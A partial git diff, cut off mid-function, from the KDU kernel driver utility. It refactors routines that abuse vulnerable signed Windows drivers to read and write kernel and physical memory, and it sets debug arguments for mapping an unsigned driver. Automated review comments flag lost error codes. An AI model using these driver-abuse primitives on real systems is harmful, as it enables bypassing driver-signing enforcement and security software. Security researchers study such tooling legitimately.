diff --git a/KDU.sha256 b/KDU.sha256
index 6411b51..f26f2bc 100644
--- a/KDU.sha256
+++ b/KDU.sha256
@@ -35,7 +35,7 @@ ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaz
888a436b666b00592d29e8a2e82a9b5c7f0c1d4890aaab8cb2f623181ad07092 *Source\Hamakaze\ipcsvc.h
a29f7dd29a464e1e044afd94791a5d51c7f69ba7c30af0bf7973178e013d1028 *Source\Hamakaze\KDU.vcxproj
55f3a6393ae677fc99380250728e5f068a98eeccea68a68610482056a5f3fbb2 *Source\Hamakaze\KDU.vcxproj.filters
-4b4891c7915e25ca6f58cb0d5a6b2e8c73484c73921d4ef699abbb7bd98494ec *Source\Hamakaze\KDU.vcxproj.user
+2b23e54f534686163cb13717df7ab939c5adfb21d15d791298d36a72cbc5c11d *Source\Hamakaze\KDU.vcxproj.user
a76a917502286d6a7fc36127d1f880b7facb8d882c3defcb758162c223093a37 *Source\Hamakaze\kduplist.h
0d45b44d55d3986f8dfca4528c54597cfbc7b120166d9f3d526a22b530ff4480 *Source\Hamakaze\kduprov.cpp
13a842b3bc62995ab8071ae56df74065d6a1388fcda66884012c6d8addb94055 *Source\Hamakaze\kduprov.h
@@ -46,13 +46,13 @@ eaeb06030f296d1147869dc65254a990425033b64e654f5d0e1c1408eebc2d93 *Source\Hamakaz
eb15810b52b16482f3a3a679fbeed102257bfa0416243e74fce5b634daf9b074 *Source\Hamakaze\ps.h
6ab34cc400e37c37605e0b04b076f9464172c6e1ae749b19f7d0c73f2d7177e3 *Source\Hamakaze\resource.h
f02b459bbc24380e6d2e2d80dfd0372a706f9c8c2f75df939ffbd5f7d6826dda *Source\Hamakaze\resource.rc
-a96ea46fac8d9c25c370aebd19a262c3277fc4bdf81043c043078f012971a7dd *Source\Hamakaze\shellcode.cpp
+a6f3ec0bc0beb0ef152a2a33ca5cbd27bf538316ddf90545b31cd5a78114d6ec *Source\Hamakaze\shellcode.cpp
87c7274c6e821eb447ec87b63b0a058c59f0e64f0c109cfc1d529fb8e2f25150 *Source\Hamakaze\shellcode.h
5428b9eb02810dbc4bfd715ec657ee35a5e61e53079c65f05e1eea4f8a6fa4a0 *Source\Hamakaze\shellmasm.asm
1bc7b331c4d2be8d2b7686fee741954aa7c44f9b63f2001d451bb9d4ac6c2b61 *Source\Hamakaze\shellstager.lst
879eea1c38c0c408e3634d0ed2eeae2b8b21e1040b4b0988ea4d802de0ecd21e *Source\Hamakaze\sig.h
-fb13502ed0db29b9241a6b717cdfd95cfcf0521266bea2ec26a6eb743eb524a9 *Source\Hamakaze\sup.cpp
-60396a1465a67894d1020e7558d1c553c5331e457ec1e5d0cb1015ef551d85fe *Source\Hamakaze\sup.h
+a6160dbf3dd84af0331f665dfd1ec81dac0ce2ba54fe2911d98bd678f6c33377 *Source\Hamakaze\sup.cpp
+58a79fa6ab7e4787e0fc58176d8ec0305552223305945de454992741a6bdde11 *Source\Hamakaze\sup.h
d19e67019fc5666a80a153991ec3d2ac3a7e8dbe088dd9ff93d3e0d0ced91cde *Source\Hamakaze\sym.cpp
292efaabf3f6223761aef1fc418ec98108fb529c7260d9d4a72715378c6b7547 *Source\Hamakaze\sym.h
feeeb953ad589ad1d056b406848f810fe8ac069ed232b9d91a946b1a9dc2ff7e *Source\Hamakaze\tests.cpp
@@ -64,7 +64,7 @@ ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaz
fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaze\hde\hde64.h
9d37519623d404987300d3f3258148ba9adddfe1bed5f89a0e9e47646819c9c7 *Source\Hamakaze\hde\pstdint.h
0b6c69ad498e67907e0c574ab06123aee4ec30c99fa181099ea929a8d820bfc1 *Source\Hamakaze\hde\table64.h
-76295f1463903ba5ed48ec7e04bb7c43ec4f0b76f112141aedcdbc6cc3355039 *Source\Hamakaze\idrv\alcpu.cpp
+e2a05d3c5c316ce6ad5fb8439508803a23f2c1cf5c5b7835a4276b5795cf0ef4 *Source\Hamakaze\idrv\alcpu.cpp
98a21df59cb881c1029a8a6c1ad30c9481075c2e4b1fb43969ee6607816b9c9f *Source\Hamakaze\idrv\alcpu.h
de5286bda6dd23940fb2cc0f0e5d3cd12bad73ffdcf30259bc254047a5f1142f *Source\Hamakaze\idrv\asrdrv.cpp
1c2c5b6a7addf3389a6dee6b11e4a4648d403e9c456008ecefbc79deaa34afae *Source\Hamakaze\idrv\asrdrv.h
@@ -72,11 +72,11 @@ b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaz
015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
498cbec6087b80ff01a3600221b27edd69db7debd6b6194a876a84af2ef5bee1 *Source\Hamakaze\idrv\dbk.cpp
24f81b4fdc1b924a36c981fb175b2dccebd7d029d6caed85fb731b74b22c7386 *Source\Hamakaze\idrv\dbk.h
-92d715b1e03c9f7c14aaac7ed3cc565c4dba2586134aa32eb080284fce36ddbf *Source\Hamakaze\idrv\dell.cpp
+8c61e22c624b7fce32fdb1c7fd3075c9d9ac5eb4f0ad3370f575f5af47a4d7c7 *Source\Hamakaze\idrv\dell.cpp
1d864cc688e8a2c38da6b94019f7efba771a0e0b7f68e1c3f8700b8caa76dda0 *Source\Hamakaze\idrv\dell.h
791a4d40f3f5076d0e6ed47e7db972f448ccc78ca578c35f11db637962c868a5 *Source\Hamakaze\idrv\directio64.cpp
73a97fa34df9c0733981536f2079d1eab89bfaf36b4c5d0003cb87d504764ec3 *Source\Hamakaze\idrv\directio64.h
-65c53a700fff2f766420a7e0612446aed7ef8f04fd44162ff73c0ba7e3581d77 *Source\Hamakaze\idrv\gmer.cpp
+e8d7c1c93512be4dd846d6c401c8135ae291354db99c926942176017db56bc91 *Source\Hamakaze\idrv\gmer.cpp
89d1cfb34afec23dbda6f40030a95386e9bbbc395666e2c0a3d066dc2fa8b0b8 *Source\Hamakaze\idrv\gmer.h
865bba446ad9f202f2bea58aec4cf48fa87448105dee2fb69caab37ec54f66e8 *Source\Hamakaze\idrv\hilscher.cpp
db94f36f0d3b946500352ab07393994f0a09e2737a63e1cdbedd3da16c72cb2d *Source\Hamakaze\idrv\hilscher.h
@@ -85,7 +85,7 @@ ae9dd179c7fdc2b1a4741399e64fa9d4a13d22b7fad45cedea9ce285fe7399ea *Source\Hamakaz
f3c889ede5142f88b54d3e5e973b46f0fb897d306695de82df9c683f72774fb8 *Source\Hamakaze\idrv\ldrsc.h
513a4821cd2ed1f2e8a1cf5566f46c82000baaa01fe08b3d8b3707442a3776c9 *Source\Hamakaze\idrv\lenovo.cpp
bde727787cee5122c4e2db9f9f8e67afda8d7ae3debea07516f92a792a103d48 *Source\Hamakaze\idrv\lenovo.h
-8bcc062ab27f293c35df032340e761f18013d978fd3df33fbaca3a30a2726b5f *Source\Hamakaze\idrv\lha.cpp
+895f9fbf94dad737f812de5be1fb0ab600f72d2c4b7b3d784bb14caaf62b7abc *Source\Hamakaze\idrv\lha.cpp
dcb5da7acb4997abbde8372a8daf74dae5727ca5cbf80b26876fdb4cb2a0bc08 *Source\Hamakaze\idrv\lha.h
cd54a9949aab0c5552c0defaef6b1a007e259b0b3e5ab8a3683ef0baa951a331 *Source\Hamakaze\idrv\mapmem.cpp
a03968ba9941a3ebb40de2a7e3f0f90aac6e0f750e72231a3570b6fe28c614a8 *Source\Hamakaze\idrv\mapmem.h
@@ -93,7 +93,7 @@ aa367663a843d7ca621a68a0490877b418a8b31afa11ad691e1f1af294c199dc *Source\Hamakaz
27c23f2e7eb5a6efceba108c2551c692f6317d03bff5563bb38d117d6699eeb4 *Source\Hamakaze\idrv\marvinhw.h
d281289e0cda5f4171e999bb1313aa235c54583aa8b0df3aa187af35b4ba2057 *Source\Hamakaze\idrv\mimidrv.cpp
395143a2f6451bc4f62a5a8f362e579e35bdc6de8f3fc4c6ab5f8bce946cd467 *Source\Hamakaze\idrv\mimidrv.h
-ce53137a648e55c800e6641b9cb3bf9c148598bbb47972b947f4e4620ae61c9d *Source\Hamakaze\idrv\nal.cpp
+2732060e740928d5976dc7ead49d9bf17be7fd09b98b303b2e328c9ce39a2480 *Source\Hamakaze\idrv\nal.cpp
5cb51cbc6d2b2e3174fc2ebbb713e32c34d4d367f299060f400dac331183d236 *Source\Hamakaze\idrv\nal.h
f9463d258e2528738ee749a86683079e8b870b8c84d292352952be207b9daff5 *Source\Hamakaze\idrv\phymem.cpp
399a9ced700381d0e3641f2d97a3e9f5dd59cbe22098ac9c0178454f9060d412 *Source\Hamakaze\idrv\phymem.h
@@ -101,13 +101,13 @@ f9463d258e2528738ee749a86683079e8b870b8c84d292352952be207b9daff5 *Source\Hamakaz
8449d829c3285f5a22521fba0db1516c487818f901fd28939fc18fbc3da0eedb *Source\Hamakaze\idrv\procexp.h
bd0c80bc267d1fa0b423a453a22958a8b1ab1ede29291217cc045a9a877a347f *Source\Hamakaze\idrv\rtcore.cpp
08f75ea88874a507c132bafc412c88f9cc9862f78c238dcbd0cc480a04a438f4 *Source\Hamakaze\idrv\rtcore.h
-7e3b832db9b2d83d706b854e30a5fc2619905f4e2187b948864bad75da55e92a *Source\Hamakaze\idrv\ryzen.cpp
+8fca55a7ff95a1c230fec101938551ea6912a14345b6d39c849e5dcf9b6577eb *Source\Hamakaze\idrv\ryzen.cpp
653d97baf28622ea8ffa0fdc99c201343213ab0a7318caef012a8967cc51660c *Source\Hamakaze\idrv\ryzen.h
a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaze\idrv\rzpnk.cpp
36ec0baeec7b61dbd9936507fcf1bf5aefec08e96ffe3bcb4883785ea2d9a542 *Source\Hamakaze\idrv\rzpnk.h
-f5f39190e7aac79f20caa4d99f8e4db83e67441db83422c9c08749d46a38db8e *Source\Hamakaze\idrv\winio.cpp
+35d01bbb1a19f50b23a201aef04c1ee718a137a5d9330b126645703bdd2d1514 *Source\Hamakaze\idrv\winio.cpp
d0e354d2f97e993e5e40fb6bb2b99b5bc753beb23f8213d44f99c0309210c1e8 *Source\Hamakaze\idrv\winio.h
-21c357fab30206cb0942e2fbfef6716b2f315d3620827ee32db451a2ebbc3c7d *Source\Hamakaze\idrv\winring0.cpp
+b3a7fc6cc6a5b33a71a7f043c9a649238de2f7755075a6f5c91c2a544c81f0d8 *Source\Hamakaze\idrv\winring0.cpp
103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h
285c2c1c44e863142bd5d0606a2bc940fb0e444aa825a675d472860a0499d5e4 *Source\Hamakaze\idrv\zemana.cpp
da1ea3c2ceebfdc6e5c338461dc214798870a0d6aa16f7f23c045123fa450f71 *Source\Hamakaze\idrv\zemana.h
@@ -140,8 +140,8 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Shared\
0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\Shared\minirtl\_strncpy.c
8acab5c8b8b339bdaf8e7b7d06f2cd6b10d24f889ef92462e4e53abbc5dc5341 *Source\Shared\ntos\halamd64.h
ffac2569a1dd61c400cda45839c7314bdd99cfcb5c17d503807db34c168628d2 *Source\Shared\ntos\ntalpc.h
-3e7447b7e1947ce73e6f1b98c3b9f15905e1a8306ff238197683a1372d91ba48 *Source\Shared\ntos\ntbuilds.h
-7ffb25f7978b4a6caa874dfb406607320de94f43285b5a4e882c3676f0d6b795 *Source\Shared\ntos\ntos.h
+edfa8fc4ae20deaa0f7843c15b51a80e5139d661f8c385f2b6d05863cd15c3bc *Source\Shared\ntos\ntbuilds.h
+f6da2ee9a7ec2afa9bb10f22cecf315074a35d3191ec37e6043898d660d49211 *Source\Shared\ntos\ntos.h
978fc994fddd0302d469df4daefc5ff398a97da62bfabdafe50817916a97361a *Source\Shared\ntos\ntsup.c
572e137cf67f3bf6b5f2fefb4db04c713bd7e8d295d45abacddb5c920a1a0bce *Source\Shared\ntos\ntsup.h
261011d0ee9c2d2ee22dad2cdb45d66449b22b5a831fd60293f315c72968dd32 *Source\Shared\tinyaes\aes.c
diff --git a/README.md b/README.md
index 09cefcc..13b7611 100644
--- a/README.md
+++ b/README.md
@@ -201,6 +201,7 @@ Using this program might crash your computer with BSOD. Compiled binary and sour
* KDU v1.2 release and the wonderful world of Microsoft incoherency, https://swapcontext.blogspot.com/2022/02/kdu-v12-release-and-wonderful-world-of.html
* How to exploit a vulnerable windows driver, https://github.com/stong/CVE-2020-15368
* CVE-2022-3699, https://github.com/alfarom256/CVE-2022-3699
+* LOLDrivers, https://www.loldrivers.io
# Wormhole drivers code
diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
index efe5879..537c2c0 100644
--- a/Source/Hamakaze/KDU.vcxproj.user
+++ b/Source/Hamakaze/KDU.vcxproj.user
@@ -5,7 +5,7 @@
WindowsLocalDebugger
- -test
+ -prv 30 -map c:\install\dummy.sys
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Hamakaze/idrv/alcpu.cpp b/Source/Hamakaze/idrv/alcpu.cpp
index 8d84dad..56ca038 100644
--- a/Source/Hamakaze/idrv/alcpu.cpp
+++ b/Source/Hamakaze/idrv/alcpu.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: ALSYSIO64.CPP
*
-* VERSION: 1.28
+* VERSION: 1.31
*
-* DATE: 01 Dec 2022
+* DATE: 14 Apr 2023
*
* ALSYSIO64 driver routines.
*
@@ -70,29 +70,24 @@ BOOL WINAPI AlcWritePhysicalMemory(
value = FIELD_OFFSET(ALCPU_WRITE_REQUEST, Data) + NumberOfBytes;
size = ALIGN_UP_BY(value, PAGE_SIZE);
- pRequest = (ALCPU_WRITE_REQUEST*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (ALCPU_WRITE_REQUEST*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
+ pRequest->Size = NumberOfBytes;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
- pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
- pRequest->Size = NumberOfBytes;
- RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
-
- bResult = supCallDriver(DeviceHandle,
- IOCTL_ALCPU_WRITE_MEMORY,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
-
- VirtualUnlock(pRequest, size);
- }
-
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_ALCPU_WRITE_MEMORY,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
+ supFreeLockedMemory(pRequest, size);
}
return bResult;
diff --git a/Source/Hamakaze/idrv/dell.cpp b/Source/Hamakaze/idrv/dell.cpp
index f94d3cf..ed3a9fc 100644
--- a/Source/Hamakaze/idrv/dell.cpp
+++ b/Source/Hamakaze/idrv/dell.cpp
@@ -6,7 +6,7 @@
*
* VERSION: 1.31
*
-* DATE: 24 Mar 2023
+* DATE: 14 Apr 2023
*
* Dell drivers routines.
*
@@ -132,35 +132,30 @@ BOOL WINAPI DbUtilReadVirtualMemory(
size = (SIZE_T)FIELD_OFFSET(DBUTIL_READWRITE_REQUEST, Data) + NumberOfBytes;
- pRequest = (DBUTIL_READWRITE_REQUEST*)VirtualAlloc(NULL, size,
+ pRequest = (DBUTIL_READWRITE_REQUEST*)supAllocateLockedMemory(size,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->Unused = 0xDEADBEEF;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->Offset = 0;
- pRequest->Unused = 0xDEADBEEF;
- pRequest->VirtualAddress = VirtualAddress;
- pRequest->Offset = 0;
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_DBUTIL_READVM,
+ pRequest,
+ (ULONG)size,
+ pRequest,
+ (ULONG)size);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_DBUTIL_READVM,
- pRequest,
- (ULONG)size,
- pRequest,
- (ULONG)size);
-
- if (!bResult) {
- dwError = GetLastError();
- }
- else {
- RtlCopyMemory(Buffer, pRequest->Data, NumberOfBytes);
- }
-
- VirtualUnlock(pRequest, size);
+ if (!bResult) {
+ dwError = GetLastError();
+ }
+ else {
+ RtlCopyMemory(Buffer, pRequest->Data, NumberOfBytes);
}
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ supFreeLockedMemory(pRequest, size);
}
SetLastError(dwError);
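Review bot: When supAllocateLockedMemory returns NULL, dwError is still ERROR_SUCCESS and the `SetLastError(dwError);` at the end of the hunk overwrites whatever VirtualAllocEx/VirtualLock reported, so the caller gets FALSE with a last-error of 0. The old VirtualLock-failure path had the same gap, but this refactor is the place to close it: add `else { dwError = GetLastError(); }` after the `if (pRequest) { ... }` block, the way NalReadVirtualMemory in this same commit does. DbUtilReadVirtualMemory starts and ends outside the hunk.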
@@ -191,32 +186,27 @@ BOOL WINAPI DbUtilWriteVirtualMemory(
size = (SIZE_T)FIELD_OFFSET(DBUTIL_READWRITE_REQUEST, Data) + NumberOfBytes;
- pRequest = (DBUTIL_READWRITE_REQUEST*)VirtualAlloc(NULL, size,
+ pRequest = (DBUTIL_READWRITE_REQUEST*)supAllocateLockedMemory(size,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->Unused = 0xDEADBEEF;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->Offset = 0;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
- pRequest->Unused = 0xDEADBEEF;
- pRequest->VirtualAddress = VirtualAddress;
- pRequest->Offset = 0;
- RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_DBUTIL_WRITEVM,
+ pRequest,
+ (ULONG)size,
+ pRequest,
+ (ULONG)size);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_DBUTIL_WRITEVM,
- pRequest,
- (ULONG)size,
- pRequest,
- (ULONG)size);
-
- if (!bResult)
- dwError = GetLastError();
-
- VirtualUnlock(pRequest, size);
- }
+ if (!bResult)
+ dwError = GetLastError();
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ supFreeLockedMemory(pRequest, size);
}
SetLastError(dwError);
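Review bot: The allocation-failure path still leaves dwError at ERROR_SUCCESS, so a NULL from supAllocateLockedMemory ends in `SetLastError(dwError);` clearing the real error before the caller can read it. Add `else { dwError = GetLastError(); }` after the `if (pRequest) { ... }` block so the VirtualAllocEx/VirtualLock error survives, matching the nal.cpp functions in this commit. DbUtilWriteVirtualMemory starts and ends outside the hunk.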
@@ -244,36 +234,33 @@ BOOL WINAPI DpdReadPhysicalMemory(
SIZE_T size;
size = sizeof(PCDCSRVC_READWRITE_REQUEST) + NumberOfBytes;
- pvBuffer = (PVOID)VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ pvBuffer = (PVOID)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pvBuffer) {
- if (VirtualLock(pvBuffer, size)) {
+ request.PhysicalAddress.QuadPart = PhysicalAddress;
+ request.Size = NumberOfBytes;
+ request.Granularity = 0; //use direct memmove
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_PCDCSRVC_READPHYSMEM,
+ &request,
+ sizeof(PCDCSRVC_READWRITE_REQUEST),
+ pvBuffer,
+ NumberOfBytes);
- request.PhysicalAddress.QuadPart = PhysicalAddress;
- request.Size = NumberOfBytes;
- request.Granularity = 0; //use direct memmove
+ if (bResult) {
- bResult = supCallDriver(DeviceHandle,
- IOCTL_PCDCSRVC_READPHYSMEM,
- &request,
- sizeof(PCDCSRVC_READWRITE_REQUEST),
+ RtlCopyMemory(Buffer,
pvBuffer,
NumberOfBytes);
- if (bResult) {
-
- RtlCopyMemory(Buffer,
- pvBuffer,
- NumberOfBytes);
-
- }
-
- VirtualUnlock(pvBuffer, size);
}
- VirtualFree(pvBuffer, 0, MEM_RELEASE);
-
+ supFreeLockedMemory(pvBuffer, size);
}
return bResult;
@@ -298,36 +285,33 @@ BOOL WINAPI DpdWritePhysicalMemory(
SIZE_T size;
size = sizeof(PCDCSRVC_READWRITE_REQUEST) + NumberOfBytes;
- pRequest = (PCDCSRVC_READWRITE_REQUEST*)VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-
- if (pRequest) {
- if (VirtualLock(pRequest, size)) {
-
- pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
- pRequest->Granularity = 0; //use direct memmove
- pRequest->Size = NumberOfBytes;
-
- //
- // Append data buffer to the tail.
- //
- RtlCopyMemory(
- RtlOffsetToPointer(pRequest, sizeof(PCDCSRVC_READWRITE_REQUEST)),
- Buffer,
- NumberOfBytes);
+ pRequest = (PCDCSRVC_READWRITE_REQUEST*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_PCDCSRVC_WRITEPHYSMEM,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
-
- VirtualUnlock(pRequest, size);
- }
+ if (pRequest) {
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
+ pRequest->Granularity = 0; //use direct memmove
+ pRequest->Size = NumberOfBytes;
+ //
+ // Append data buffer to the tail.
+ //
+ RtlCopyMemory(
+ RtlOffsetToPointer(pRequest, sizeof(PCDCSRVC_READWRITE_REQUEST)),
+ Buffer,
+ NumberOfBytes);
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_PCDCSRVC_WRITEPHYSMEM,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
+
+ supFreeLockedMemory(pRequest, size);
}
return bResult;
diff --git a/Source/Hamakaze/idrv/gmer.cpp b/Source/Hamakaze/idrv/gmer.cpp
index 8c5ae21..bba6872 100644
--- a/Source/Hamakaze/idrv/gmer.cpp
+++ b/Source/Hamakaze/idrv/gmer.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: GMER.CPP
*
-* VERSION: 1.20
+* VERSION: 1.31
*
-* DATE: 08 Feb 2022
+* DATE: 14 Apr 2023
*
* GMER driver routines.
*
@@ -99,32 +99,28 @@ BOOL WINAPI GmerWriteVirtualMemory(
value = FIELD_OFFSET(GMER_WRITE_REQUEST, Data) + NumberOfBytes;
size = ALIGN_UP_BY(value, PAGE_SIZE);
- pRequest = (GMER_WRITE_REQUEST*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (GMER_WRITE_REQUEST*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->Unused = 0;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->DataSize = NumberOfBytes;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
- pRequest->Unused = 0;
- pRequest->VirtualAddress = VirtualAddress;
- pRequest->DataSize = NumberOfBytes;
- RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_GMER_WRITEVM,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_GMER_WRITEVM,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
+ if (!bResult)
+ dwError = GetLastError();
- if (!bResult)
- dwError = GetLastError();
-
- VirtualUnlock(pRequest, size);
- }
-
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ supFreeLockedMemory(pRequest, size);
}
SetLastError(dwError);
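Review bot: If supAllocateLockedMemory fails, nothing in the new code records the error: dwError stays ERROR_SUCCESS and `SetLastError(dwError);` reports success alongside a FALSE return. Mirror the nal.cpp pattern with `else { dwError = GetLastError(); }` after the `if (pRequest) { ... }` block. GmerWriteVirtualMemory starts and ends outside the hunk.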
diff --git a/Source/Hamakaze/idrv/lha.cpp b/Source/Hamakaze/idrv/lha.cpp
index 9ed60a6..ed70469 100644
--- a/Source/Hamakaze/idrv/lha.cpp
+++ b/Source/Hamakaze/idrv/lha.cpp
@@ -77,33 +77,27 @@ BOOL WINAPI LHAWritePhysicalMemory(
value = FIELD_OFFSET(LHA_WRITE_PHYSICAL_MEMORY, Data) + NumberOfBytes;
size = ALIGN_UP_BY(value, PAGE_SIZE);
- pRequest = (LHA_WRITE_PHYSICAL_MEMORY*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (LHA_WRITE_PHYSICAL_MEMORY*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->Address = PhysicalAddress;
+ pRequest->Size = NumberOfBytes;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
- pRequest->Address = PhysicalAddress;
- pRequest->Size = NumberOfBytes;
- RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_LHA_WRITE_PHYSICAL_MEMORY,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_LHA_WRITE_PHYSICAL_MEMORY,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
-
- if (!bResult)
- dwError = GetLastError();
-
- VirtualUnlock(pRequest, size);
- }
- else {
+ if (!bResult)
dwError = GetLastError();
- }
- VirtualFree(pRequest, 0, MEM_RELEASE);
+
+ supFreeLockedMemory(pRequest, size);
}
SetLastError(dwError);
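Review bot: This hunk drops the `else { dwError = GetLastError(); }` that previously captured the VirtualLock failure, and nothing replaces it for the new combined allocate-and-lock failure, so an allocation error is now reported as ERROR_SUCCESS by the trailing `SetLastError(dwError);` — a regression relative to the removed code. Re-add `else { dwError = GetLastError(); }` after the `if (pRequest) { ... }` block. LHAWritePhysicalMemory starts and ends outside the hunk.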
diff --git a/Source/Hamakaze/idrv/nal.cpp b/Source/Hamakaze/idrv/nal.cpp
index 2224eef..54ae70f 100644
--- a/Source/Hamakaze/idrv/nal.cpp
+++ b/Source/Hamakaze/idrv/nal.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: NAL.CPP
*
-* VERSION: 1.10
+* VERSION: 1.31
*
-* DATE: 15 Apr 2021
+* DATE: 14 Apr 2023
*
* Intel Network Adapter iQVM64 driver routines.
*
@@ -184,36 +184,32 @@ BOOL NalReadVirtualMemory(
DWORD dwError = ERROR_SUCCESS;
NAL_MEMMOVE request;
- PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
- if (lockedBuffer) {
-
- if (VirtualLock(lockedBuffer, NumberOfBytes)) {
+ PVOID lockedBuffer = (PVOID)supAllocateLockedMemory(NumberOfBytes,
+ MEM_RESERVE | MEM_COMMIT,
+ PAGE_READWRITE);
- RtlSecureZeroMemory(&request, sizeof(request));
- request.Header.FunctionId = NAL_FUNCID_MEMMOVE;
- request.SourceAddress = VirtualAddress;
- request.DestinationAddress = (ULONG_PTR)lockedBuffer;
- request.Length = NumberOfBytes;
+ if (lockedBuffer) {
- bResult = NalCallDriver(DeviceHandle, &request, sizeof(request));
- if (bResult) {
- RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes);
- }
- else {
- dwError = GetLastError();
- }
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.Header.FunctionId = NAL_FUNCID_MEMMOVE;
+ request.SourceAddress = VirtualAddress;
+ request.DestinationAddress = (ULONG_PTR)lockedBuffer;
+ request.Length = NumberOfBytes;
- VirtualUnlock(lockedBuffer, NumberOfBytes);
+ bResult = NalCallDriver(DeviceHandle, &request, sizeof(request));
+ if (bResult) {
+ RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes);
}
else {
dwError = GetLastError();
}
- VirtualFree(lockedBuffer, 0, MEM_RELEASE);
+ supFreeLockedMemory(lockedBuffer, NumberOfBytes);
}
else {
dwError = GetLastError();
}
+
SetLastError(dwError);
return bResult;
}
@@ -237,31 +233,26 @@ BOOL NalWriteVirtualMemory(
DWORD dwError = ERROR_SUCCESS;
NAL_MEMMOVE request;
- PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+ PVOID lockedBuffer = (PVOID)supAllocateLockedMemory(NumberOfBytes,
+ MEM_RESERVE | MEM_COMMIT,
